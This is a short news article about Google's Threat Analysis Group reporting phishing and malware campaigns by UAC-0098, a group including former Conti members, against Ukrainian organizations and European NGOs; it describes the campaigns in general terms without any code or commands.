Ransomware

Google has announced that its Threat Analysis Group (TAG) has detected ongoing cyberattacks against Ukraine that include former members of the Conti hacker group.

TAG is group of subject matter experts focusing on cybersecurity and forensic analysis that defends Google and its users from nation-state and advanced persistent threats.

The attacks have been persistent, with TAG detailing five separate attack campaigns by a group tagged as UAC-0098 against Ukraine and European non-governmental organizations (NGOs).

The attacks possess multiple indicators of repurposed attacks from the Conti hacker group, and former members of the group are confirmed to now be a part of UAC-0098.

UAC-0098 has historically carried out human-operated ransomware attacks. Google’s TAG unit first started tracking the group in April 2022, where it launched an email phishing campaign using AnchorMail (also known as “LackeyBuilder”). AnchorMail uses the simple mail transfer protocol (SMTP) for command and control (C2) communication. AnchorMail was developed by Conti.

Additional email campaign attacks were launched in April utilizing other malware such as IcedID and CobaltStrike.

Although the techniques varied, the targeting was consistently against Ukrainian hotels and organizations, per TAG.

In May 2022, UAC-0098 launched another attack against Ukrainian organizations, this time impersonating the National Cyber Police of Ukraine. The email had a malicious link and urged recipients to download an update for their operating system.

The attack would run a PowerShell script downloaded from a malicious domain on the victim’s computer.

The attacks continue to escalate, with UAC-0098 impersonating Microsoft and StarLink against European NGOs.

The Russian Conti hacker group may have disbanded, but they have now splintered off into separate groups, including UAC-0098. Ransomware gangs like BlackCat, Hive, and AvosLocker have all been infiltrated by former Conti members, according to BleepingComputer.

Conti first surfaced in 2020, replacing the Ryuk ransomware group.